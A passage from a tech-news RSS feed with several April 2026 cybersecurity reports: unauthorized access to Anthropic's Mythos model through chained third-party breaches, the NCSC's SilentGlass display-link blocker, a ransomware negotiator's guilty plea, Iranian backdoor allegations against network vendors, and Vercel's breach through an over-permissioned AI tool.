                                <p>Unauthorized individuals have gained access to Anthropic's cybersecurity-focused AI model, Mythos, a breach that may have exposed a number of Anthropic's proprietary AI models, <a href="https://www.bloomberg.com/news/articles/2026-04-21/anthropic-s-mythos-model-is-being-accessed-by-unauthorized-users" target="_blank"><em>Bloomberg </em>reports.</a> For a company that markets itself as the responsible, safety- and security-first AI developer, this lapse raises questions about how well Anthropic can protect the data of its customers — and <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/anthropics-claude-mythos-might-be-the-best-overall-ai-model-for-cybersecurity-but-cheaper-models-can-attain-similar-results-research-shows-cross-examination-of-the-frontier-model-raises-questions-on-uptime-and-reliability" target="_blank">just how good Mythos really is at preventing breaches.</a></p><p>Unfortunately, as capable as any AI model is at finding code bugs that raise security concerns, it can't do much to prevent bugs in third-party provider tools that haven't been vetted by Mythos, nor account for social engineering, which has always been the weakest link in digital security. </p><h2 id="they-got-in-through-the-side-door">They got in through the side door</h2><p>Anthropic disrupted major institutions with the internal unveiling of Mythos, which it claimed had found thousands of critical exploits in every major browser and operating system. Although there was <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/anthropics-claude-mythos-isnt-a-sentient-super-hacker-its-a-sales-pitch-claims-of-thousands-of-severe-zero-days-rely-on-just-198-manual-reviews" target="_blank">a lot of marketing hype in the 200+ page mission statement</a> Anthropic released, venerating its own model, some have found success using it to sniff out new bugs. For instance, Mozilla announced that it used Mythos<a href="https://blog.mozilla.org/en/privacy-security/ai-security-zero-day-vulnerabilities/" target="_blank"> to find and patch over 270 vulnerabilities</a> in the Firefox browser.</p><p>Although it has been proven that some older models can find many of the same bugs, they can't do so as quickly, or possibly as well. This new model is genuinely faster at coding and finding vulnerabilities than Claude Opus 4.6, and possibly other models from other developers, too. But it's also good at exploiting those vulnerabilities, which is allegedly why Anthropic limited access to a select number of companies and non-profits.</p><p>Because of that, banks and software developers aren't the only parties keen to get an early look at Mythos. A worker at a third-party contractor for Anthropic used their unique access to the company's services to breach Mythos' protected environment and gain access to the model, allegedly using standard internet sleuthing tools used by cybersecurity researchers.</p><p>This worker was then able to open up the model to their colleagues, with a small group of unauthorized users now said to have accessed Mythos. Although the group has reportedly not run any cybersecurity-related prompts through Mythos just yet, and has instead only asked it to perform simple tasks like creating websites. This is designed to stop Anthropic catching on to who is using Mythos, thereby making it possible to shut down the group's access.</p><h2 id="this-all-feels-familiar">This all feels familiar</h2><p>The group that now has access to Mythos was able to gain such privileged permissions by guessing the model's online location based on knowledge of Anthropic's file systems and the naming formats it used for previous models. They garnered this information from a recent hack of an AI feedback recruitment company, Mercor, which is now facing several class action lawsuits for revealing personal information about users. It's also losing major business since the breach, most notably, Meta has paused its contracts with the company.</p><p>The irony is that Mercor was hacked <a href="" target="_blank">via a third-party open source tool called LiteLLM</a>.  Where that hack was perpetuated by a group known as TeamPCP, however, the group that targeted Mercor was known as Lapsus$. While it used the LiteLLM compromise to infiltrate Mercor, it had targeted the AI recruitment company deliberately.</p><p>Allegedly, around 4TB of data was stolen in the breach. That included sensitive information of its recruitment candidates, including their profiles and personal information. However, Mercor also handles data from model companies, which is why some are reconsidering their contracts with Mercor. Model data is some of the most sensitive information in the world, worth billions. Anthropic's Mythos? Perhaps even more so.</p><p>But neither company could protect it.</p><p>Anthropic was breached because of a breach at Mercor. This was breached because of a breach at LiteLLM. The layers keep stacking, too, as LiteLLM was allegedly breached because of fake security credentials from a third-party provider of its own, <a href="https://techcrunch.com/2026/04/09/after-data-breach-10b-valued-startup-mercor-is-having-a-month/" target="_blank">Delve, as <em>TechCrunch </em>reports</a>.</p><h2 id="only-as-strong-as-the-weakest-link">Only as strong as the weakest link</h2><p>As much as Anthropic's marketing for Mythos might be heavy on the spin and deliberately fearmongering for attention, an AI model that can help make software more secure is a good thing. It's great that Mozilla has fixed hundreds of vulnerabilities, and even though it is possible this could have occurred with other models, if other organizations and developers use Mythos to do the same, that's great too.</p><p>But the unauthorized Mythos access and the chain of breaches of third-party tools that enabled it highlight one thing: You are only as secure as the weakest link in your chain. Often with cybersecurity, that's the human element. Social engineering is a crucial attack vector in 2026. Especially as tools like Mythos close more code-based vulnerabilities.</p><p>But as agentic AI grows in popularity and capability, more tools are integrated, and people hand over more personal data to AI assistants to automate workflows, the security issues are only compounding. Trusting third parties without oversight can be the downfall of companies worth billions.</p><p>Many of the latest AI endeavors are assuming trust throughout the stack of dependencies, anyway. As the Mythos breach shows, that could be a house of cards waiting to tumble.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ UK spy agency releases malware-blocking gadget for HDMI and DisplayPort cables — SilentGlass blocks malicious traffic traveling between display and computer ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/uk-spy-agency-releases-malware-blocking-gadget-for-hdmi-and-displayport-cables-silentglass-blocks-malicious-traffic-traveling-between-display-and-computer</link>
                                                                            <description>
                            <![CDATA[ The NCSC, a part of the British GCHQ, has deployed this protective gadget throughout various government estates and is now making it publicly available through Goldilock Labs. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">7BDf2MTBGEL5xBeqNXy8G6</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/CQ4CfTn7QLjSMf3oMbjYoX-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Thu, 23 Apr 2026 14:52:23 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Jowi Morales) ]]></author>                    <dc:creator><![CDATA[ Jowi Morales ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/gM7E2WSDg2wgCFoaDPz9yK.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Jowi Morales is a writer and journalist covering the tech beat since 2021. However, he’s been interested in technology far earlier than that. He started discovering desktop computers when his father brought home a Windows 95 PC, but his first real experience working under the hood of the PC was when the old computer’s hard drive was filled to the brim in the year 2000. He deleted the Windows folder to attempt to rectify the situation, which led to his dad buying a new desktop PC. Since then, he learned a lot more about computers, and he’s always been the go-to tech expert for his family and friends.&lt;/p&gt;&lt;p&gt;Jowi primarily uses a Windows workstation and an Android phone, but he also bought into the Apple ecosystem with the 6th-gen iPad, iPhone 14 Pro Max, and the M1 MacBook Air. Today, Jowi covers hardware and software from Redmond and Cupertino, while also looking at the tech industry in general.&lt;/p&gt;&lt;p&gt;Aside from covering technology, Jowi is an avid photographer and writes about automobiles, aviation, and tanks. You can find his bylines at &lt;a href=&quot;https://www.makeuseof.com/author/jowi-morales/&quot;&gt;MakeUseOf&lt;/a&gt;, &lt;a href=&quot;https://www.slashgear.com/author/jowimorales/&quot;&gt;SlashGear&lt;/a&gt;, and, of course, &lt;a href=&quot;https://www.tomshardware.com/author/jowi-morales&quot;&gt;Tom’s Hardware&lt;/a&gt;.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/CQ4CfTn7QLjSMf3oMbjYoX-1280-80.png">
                                                            <media:credit><![CDATA[NCSC]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[SilentGlass malware-over-HDMI/DP blocker]]></media:description>                                                            <media:text><![CDATA[SilentGlass malware-over-HDMI/DP blocker]]></media:text>
                                <media:title type="plain"><![CDATA[SilentGlass malware-over-HDMI/DP blocker]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/CQ4CfTn7QLjSMf3oMbjYoX-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The UK’s Government Communications Headquarters (GCHQ), a counterpart to the U.S.’s National Security Agency (NSA), just launched SilentGlass through the National Cyber Security Center (NCSC). This little gadget was announced during CYBERUK, a government-sponsored cyber security conference, and is designed to block malicious traffic traveling between a display and a PC. According to the <a href="https://www.ncsc.gov.uk/news/world-first-ncsc-engineered-device-secures-vulnerable-display-links">NCSC</a>, it built and designed this plug-and-play device to protect government estates and has been “approved for use in the most high-threat environments.”</p><p>The government has since licensed the design to Goldilock Labs, a UK-based cybersecurity firm that specializes in hardware that automatically cuts physical connections during a cyberattack, limiting potential damage to a network. It has partnered with Sony UK Technology Center to make the product available globally, although the firm has yet to put the product publicly available on the market.</p><p>“Display screens and monitors are everywhere in modern business environments, and the SilentGlass device will help protect previously vulnerable IT infrastructure with unprecedented ease,” NCSC Chief Technology Officer Ollie Whitehouse said, “Its development and commercialization show the impact that the NCSC can have, alongside industry partners, with an affordable and effective product now globally available.” Goldilock Labs co-founder Stephen Kines also said, “SilentGlass addresses a gap that has been widely overlooked. The hardware interfaces people rely on every day have rarely been treated as security boundaries, despite being exposed to risk through supply chains, third-party servicing, and direct physical access.”</p><p>While SilentGlass is an interesting security device, some information security experts question the actual need for it. Cybersecurity expert Scott McGready said on <a href="https://x.com/ScottMcGready/status/2047221720491172307">X</a>, “Can anyone genuinely tell me what risk this is addressing or is it a solution in search of a problem?” After all, most common cyberattacks do not use video signals as an attack vector. Nevertheless, that does not mean that it’s impossible to take advantage of HDMI and DisplayPort to exfiltrate information.</p><p>Way back in 2020, a research paper revealed a technique which subtly <a href="https://www.tomshardware.com/news/air-gapped-computers-pcs-cybersecurity-monitor-hack">changed monitor brightness to steal data</a> from air-gapped PCs, while a more recent study showed that <a href="https://www.tomshardware.com/tech-industry/cyber-security/ai-can-snoop-on-your-computer-screen-using-signals-leaking-from-hdmi-cables">AI can use signals leaking from HDMI cables</a> to reconstruct what the target computer is displaying. These aren’t likely problems for the billions of home and office computers around the globe, as these techniques are complicated and would often cost more to deploy than the potential data they can gather from the average civilian.</p><p>However, these vulnerabilities could be potential weak links in the security of government agencies and defense companies that deal with sensitive information. This makes them targets for nation-states who have the means and resources to use these attack vectors. The UK government has reportedly deployed this little gadget in some of its computers, and it’s now making it available for anyone else to purchase. We don’t have pricing for SilentGlass yet, but this likely won’t interest the average PC user. But for users who deal with state secrets and confidential technologies, this gadget could potentially protect their systems from a potential vulnerability that will most likely be used by technically advanced adversaries.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware negotiator pleads guilty after leaking victims' insurance details to 'BlackCat' hackers — perp gave attackers a precise picture of exactly how much each target could afford to pay ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/florida-man-pleads-guilty-after-leaking-victims-insurance-details-to-blackcat-hackers</link>
                                                                            <description>
                            <![CDATA[ Martino, of Land O’Lakes, Florida, is the third and final member of a trio of cybersecurity professionals charged in the scheme. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Btw63xx9cNMMCqo8FLtW2Q</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/j5wSes9VymTFLBkLCAqarH-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 22 Apr 2026 12:22:35 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/j5wSes9VymTFLBkLCAqarH-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty / da-kuk]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[ransomware]]></media:description>                                                            <media:text><![CDATA[ransomware]]></media:text>
                                <media:title type="plain"><![CDATA[ransomware]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/j5wSes9VymTFLBkLCAqarH-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Angelo Martino, a 41-year-old former ransomware negotiator at the incident response firm DigitalMint, has pleaded guilty to conspiring with the ALPHV/BlackCat <a href="https://www.tomshardware.com/tech-industry/cyber-security/usd115-million-ransomware-hacker-arrested-over-extortion-attacks-scattered-spider-alumnus-allegedly-involved-in-over-120-computer-network-intrusions-targeting-47-u-s-entities">ransomware gang</a> to extort five U.S. companies whose data his employer had been hired to protect, the Department of Justice <a href="https://www.justice.gov/opa/pr/florida-man-working-ransomware-negotiator-pleads-guilty-conspiracy-deploy-ransomware-and" target="_blank">announced</a> on Monday. </p><p>Martino, of Land O’Lakes, Florida, is the third and final member of a trio of cybersecurity professionals charged in the scheme; his co-conspirators, Ryan Clifford Goldberg and Kevin Tyler Martin, <a href="https://www.tomshardware.com/tech-industry/cyber-security/u-s-cybersecurity-experts-plead-guilty-for-ransomware-attacks-face-20-years-in-prison-each-group-demanded-up-to-usd10-million-from-each-victim">pleaded guilty in December</a>. Newly unsealed court filings put the total ransom payments across the insider-assisted attacks at more than $75 million, with two of the payments individually exceeding $25 million.</p><p>Starting in April 2023, Martino used his position as a negotiator to feed BlackCat operators confidential details about the five victim companies he was representing, according to the DOJ. That information included the victims' cyber insurance policy limits and details about how the negotiations were being perceived internally, giving the attackers a precise picture of exactly how much each target could afford to pay.</p><p>According to the unsealed court filings, a nonprofit victim paid a ransom worth nearly $26.8 million in cryptocurrency, a financial services company paid more than $25.6 million, and a hospitality company paid $16.5 million. A retail company paid $6.1 million, and a medical company paid $213,000.</p><p>Separately from the insider-assisted attacks, Martino also admitted to joining Goldberg and Martin in directly deploying BlackCat ransomware against additional U.S. victims between April and November 2023. Per an October 2025 indictment, the trio demanded more than $16 million in ransom from those attacks. One confirmed payment from a medical device company netted the group $1.274 million, which they split three ways after paying BlackCat's operators a cut.</p><p>Meanwhile, law enforcement has seized more than $10 million from Martino, including $9.2 million in cryptocurrency, two properties, a trailer, a luxury fishing boat, and two motor vehicles, including a 1999 Nissan Skyline, all of which were purchased with illicit proceeds. </p><p>"Angelo Martino's clients trusted him to respond to ransomware threats and help thwart and remedy them on behalf of victims," Assistant Attorney General A. Tysen Duva said in the DOJ’s statement. "Instead, he betrayed them and began launching ransomware attacks himself by assisting cybercriminals and harming victims, his own employer, and the cyber incident response industry itself."</p><p>Martino is scheduled to be sentenced on July 9th, while Goldberg and Martin are set to be sentenced on April 30th. All three face a maximum of 20 years in prison.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Iran claims US exploited networking equipment backdoors during strikes — says devices from Cisco and others failed despite blackout in attack that 'indicates deep sabotage' ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/iran-claims-us-exploited-networking-equipment-backdoors-during-strikes</link>
                                                                            <description>
                            <![CDATA[ Iranian state media has alleged that equipment from Cisco, Juniper, Fortinet, and MikroTik failed during U.S. and Israeli military operations against Iran. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">XuPv6SvnQu7E8g8gFjMwRF</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/3MENKrnKHBskAG4vmFGju5-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 22 Apr 2026 10:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/3MENKrnKHBskAG4vmFGju5-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty ]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Network cables and hub]]></media:description>                                                            <media:text><![CDATA[Network cables and hub]]></media:text>
                                <media:title type="plain"><![CDATA[Network cables and hub]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/3MENKrnKHBskAG4vmFGju5-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Iranian state media has <a href="https://www.entekhab.ir/fa/news/917640/%D9%81%D8%A7%D8%B1%D8%B3-%D8%B7%DB%8C-%D8%A7%D8%AA%D9%81%D8%A7%D9%82%DB%8C-%D8%B9%D8%AC%DB%8C%D8%A8-%D9%88-%D9%87%D8%B4%D8%AF%D8%A7%D8%B1-%D8%AF%D9%87%D9%86%D8%AF%D9%87-%D8%AC%D8%B9%D8%A8%D9%87%E2%80%8C%D9%87%D8%A7%DB%8C-%D8%B3%DB%8C%D8%A7%D9%87-%D8%A2%D9%85%D8%B1%DB%8C%DA%A9%D8%A7%DB%8C%DB%8C-%D8%AF%D8%B1-%D8%B3%D8%A7%D8%B9%D8%AA-%D8%B5%D9%81%D8%B1-%D8%AD%D9%85%D9%84%D9%87-%D8%A8%D9%87-%D8%A7%D8%B5%D9%81%D9%87%D8%A7%D9%86-%D8%A7%D8%B2-%DA%A9%D8%A7%D8%B1-%D8%A7%D9%81%D8%AA%D8%A7%D8%AF%D9%86%D8%AF-%D8%A7%DB%8C%D9%86-%D8%A7%D8%AE%D8%AA%D9%84%D8%A7%D9%84-%D8%AF%D8%B1-%D8%B4%D8%B1%D8%A7%DB%8C%D8%B7%DB%8C-%D8%B1%D8%AE-%D8%AF%D8%A7%D8%AF-%DA%A9%D9%87-%DA%AF%DB%8C%D8%AA%E2%80%8C%D9%88%DB%8C%E2%80%8C%D9%87%D8%A7%DB%8C-%D8%A8%DB%8C%D9%86%E2%80%8C%D8%A7%D9%84%D9%85%D9%84%D9%84-%D8%B9%D9%85%D9%84%D8%A7%D9%8B-%D9%85%D8%B3%D8%AF%D9%88%D8%AF-%D8%A8%D9%88%D8%AF%D9%86%D8%AF-%D8%A8%D9%86%D8%A7%D8%A8%D8%B1%D8%A7%DB%8C%D9%86-%D9%81%D8%B1%D9%88%D9%BE%D8%A7%D8%B4%DB%8C-%D9%85%D8%B0%DA%A9%D9%88%D8%B1-%D9%86%D8%B4%D8%A7%D9%86-%D8%A7%D8%B2-%DB%8C%DA%A9-%D8%AE%D8%B1%D8%A7%D8%A8%DA%A9%D8%A7%D8%B1%DB%8C-%D8%B9%D9%85%DB%8C%D9%82-%D8%AF%D8%A7%D8%B1%D8%AF-%D8%B3%D9%86%D8%A7%D8%B1%DB%8C%D9%88%DB%8C-%D8%AE%D8%B7%D8%B1%D9%86%D8%A7%DA%A9-%D8%AF%D8%B3%D8%AA%DA%A9%D8%A7%D8%B1%DB%8C-%D8%AF%D8%B1-%D9%85%D8%A8%D8%AF%D8%A3-%D8%AA%D9%88%D9%84%DB%8C%D8%AF-%D8%A7%D8%B3%D8%AA-%D8%A7%DA%AF%D8%B1-%D9%81%D8%A7%DB%8C%D9%84%E2%80%8C%D9%87%D8%A7%DB%8C-%D9%86%D8%B5%D8%A8%DB%8C-%D9%82%D8%A8%D9%84-%D8%A7%D8%B2-%D9%88%D8%B1%D9%88%D8%AF-%D8%A8%D9%87-%D8%A7%DB%8C%D8%B1%D8%A7%D9%86-%D8%A2%D9%84%D9%88%D8%AF%D9%87-%D8%B4%D8%AF%D9%87-%D8%A8%D8%A7%D8%B4%D9%86%D8%AF-%D8%AD%D8%AA%DB%8C-%D8%AA%D8%B9%D9%88%DB%8C%D8%B6-%D8%B3%DB%8C%D8%B3%D8%AA%D9%85-%D8%B9%D8%A7%D9%85%D9%84-%D9%87%D9%85-%D9%85%D8%B4%DA%A9%D9%84-%D8%B1%D8%A7-%D8%AD%D9%84-%D9%86%D9%85%DB%8C%E2%80%8C%DA%A9%D9%86%D8%AF" target="_blank">alleged</a> that equipment from Cisco, Juniper, Fortinet, and MikroTik failed during U.S. and Israeli military operations against Iran.  The report, which claims that “American ‘black boxes’ failed at zero hour of the attack on Isfahan,” concerns devices that Iran claims either rebooted or dropped offline despite the country having already been disconnected from the global Internet, a fact it says "indicates deep sabotage." </p><p>Iranian media speculates that <a href="https://www.tomshardware.com/news/cisco-backdoor-hardcoded-accounts-software,37480.html">hidden firmware or backdoors</a> allowed remote sabotage, possibly triggered by satellite or at a pre-set time. None of the claims has been independently verified, and given that the claims originate from state media, some skepticism is merited. </p><p>Meanwhile, the U.S. hasn’t addressed Iran's specific allegations, but has publicly confirmed that it conducted cyber operations against Iran's communications infrastructure. Chairman of the Joint Chiefs of Staff, General Dan Caine, said during a March 2nd Pentagon briefing that U.S. Cyber Command and U.S. Space Command were the “first movers” in so-called Operation Epic Fury, the military campaign launched against Iran at the end of February. Caine said coordinated space and cyber operations disrupted Iranian communications and sensor networks before strikes began.</p><p>Iran’s claims are unverified, but each of the four vendors it named — Cisco, Juniper, Fortinet, and MikroTik — has a documented record of security issues. NSA documents leaked by Edward Snowden in 2014, for example, demonstrated the agency’s Tailored Access Operations unit intercepting Cisco routers during shipping and installing surveillance implants before repackaging them. Cisco never cooperated with the program and later began shipping equipment to decoy addresses to disrupt interception.</p><p>Juniper Networks, in 2015, meanwhile, disclosed that it had found unauthorized code in the ScreenOS firmware running on its NetScreen firewalls, which could allow attackers to bypass authentication and decrypt VPN traffic. Fortinet acknowledged in 2016 that older versions of FortiOS contained hardcoded SSH passwords granting remote access, though it characterized the problem as a management authentication issue. As for MikroTik, its routers have been a persistent <a href="https://www.tomshardware.com/tech-industry/cyber-security/9-000-asus-routers-compromised-by-botnet-attack-and-persistent-ssh-backdoor-that-even-firmware-updates-cant-fix">target for botnet operators</a>, with Tenable documenting a vulnerability chain in 2019 that could enable an attacker to downgrade firmware and create a persistent backdoor.</p><p>Chinese state media seized the opportunity to pile on Iran’s claims, with the country’s National Computer Virus Emergency Response Center, which has repeatedly claimed that the U.S. fabricated the Volt Typhoon hacking campaign to deflect from its own cyber operations, promoted the allegations as further evidence of American backdoors in networking hardware. Five Eyes intelligence agencies have attributed Volt Typhoon to Chinese state-sponsored actors targeting Western critical infrastructure.</p><p>Iran's Internet, meanwhile, has been<a href="https://www.tomshardware.com/tech-industry/iran-passes-1000-hours-offline"> largely offline for 52 consecutive days</a>, with connectivity having sat at roughly 1% of pre-war levels since strikes began on February 28, making it the longest nationwide internet shutdown on record.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ AI cloud company Vercel breached after employee grants AI tool unrestricted access to Google Workspace — hacker seeking $2 million for stolen data  ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/vercel-breached-after-employee-grants-ai-tool-unrestricted-access-to-google-workspace</link>
                                                                            <description>
                            <![CDATA[ The breach exposed non-sensitive environment variables, and a threat actor operating under the ShinyHunters name has claimed responsibility. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">KhqPW7FcvADzCVGky7ac8b</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/JFVbbhwRYVQX9SY26qM8bd-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 20 Apr 2026 15:49:36 +0000</pubDate>                                                                                                                                <updated>Mon, 20 Apr 2026 18:07:54 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/JFVbbhwRYVQX9SY26qM8bd-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty ]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Hacker]]></media:description>                                                            <media:text><![CDATA[Hacker]]></media:text>
                                <media:title type="plain"><![CDATA[Hacker]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/JFVbbhwRYVQX9SY26qM8bd-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Vercel, the cloud platform behind the widely used Next.js web framework, has <a href="https://vercel.com/kb/bulletin/vercel-april-2026-security-incident" target="_blank">acknowledged</a> a security breach after an attacker compromised a third-party AI tool called Context.ai and used it to gain access to a Vercel employee's enterprise Google Workspace account. </p><p>The breach exposed non-sensitive environment variables, and a threat actor operating under the ShinyHunters name has claimed responsibility, reportedly seeking $2 million for the stolen data. Vercel said it has engaged Google-owned incident response firm Mandiant, notified law enforcement, and contacted a limited subset of affected customers directly.</p><p>According to Vercel’s bulletin, the breach didn’t start with them but instead with Context.ai, an enterprise AI platform that builds agents trained on company-specific knowledge. At least one Vercel employee had signed up for Context.ai's AI Office Suite using their corporate account and granted it "Allow All" OAuth permissions, Context.ai explained in its own security notice, which says that “Vercel’s internal OAuth configurations appear to have allowed this action to grant these broad permissions in Vercel’s enterprise Google Workspace.” The attacker exploited that broad access to take over the employee's Vercel Google Workspace account and move laterally into internal systems.</p><p>Cybersecurity firm <a href="https://www.hudsonrock.com/blog/6335" target="_blank">Hudson Rock</a> claims to have traced Context.ai's own compromise back further to an employee infected by Lumma Stealer malware after downloading Roblox game exploit scripts in February. The <a href="https://www.tomshardware.com/tech-industry/cyber-security/shai-hulud-malware-campaign-dubbed-the-largest-and-most-dangerous-npm-supply-chain-compromise-in-history-hundreds-of-javascript-packages-affected">stolen credentials</a> reportedly included Google Workspace logins along with keys for Supabase, Datadog, and Authkit, Hudson Rock reported, but Vercel hadn’t independently confirmed this at the time of writing. </p><p>Context.ai also acknowledged that it detected and blocked unauthorized access to its AWS environment in March, but said it later learned the attacker had also compromised OAuth tokens for some consumer users.</p><p>Vercel described the attacker as "highly sophisticated based on their operational velocity and detailed understanding of Vercel's systems.” The company said environment variables marked as "sensitive" are encrypted at rest and were not accessed, but that variables stored without that designation should be treated as potentially exposed. The company instructed customers to audit activity logs, rotate any API keys, tokens, or database credentials stored in non-sensitive environment variables, and review recent deployments for anything unexpected.</p><p>Vercel has since rolled out new dashboard features, including an overview page for environment variables and an improved interface for managing sensitive variable settings. CEO Guillermo Rauch said on X that the company had analyzed its supply chain and confirmed that Next.js, Turbopack, and its other open source projects weren’t affected.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Bluetooth tracker hidden in a postcard and mailed to a warship exposed its location — $5 gadget put a $585 million Dutch ship at risk for 24 hours ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/bluetooth-tracker-hidden-in-a-postcard-and-mailed-to-a-warship-exposed-its-location-a-eur5-gadget-put-a-eur500-million-dutch-ship-at-risk-for-24-hours</link>
                                                                            <description>
                            <![CDATA[ A Dutch journalist mailed a postcard to a Dutch Navy ship containing a hidden Bluetooth tracker, allowing them to track its route for 24 hours before it was found and disabled. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">VAhirUkMNnMJZ6PBh2hre</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/mrDHs97dg7kKm8H7v2ZAUi-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
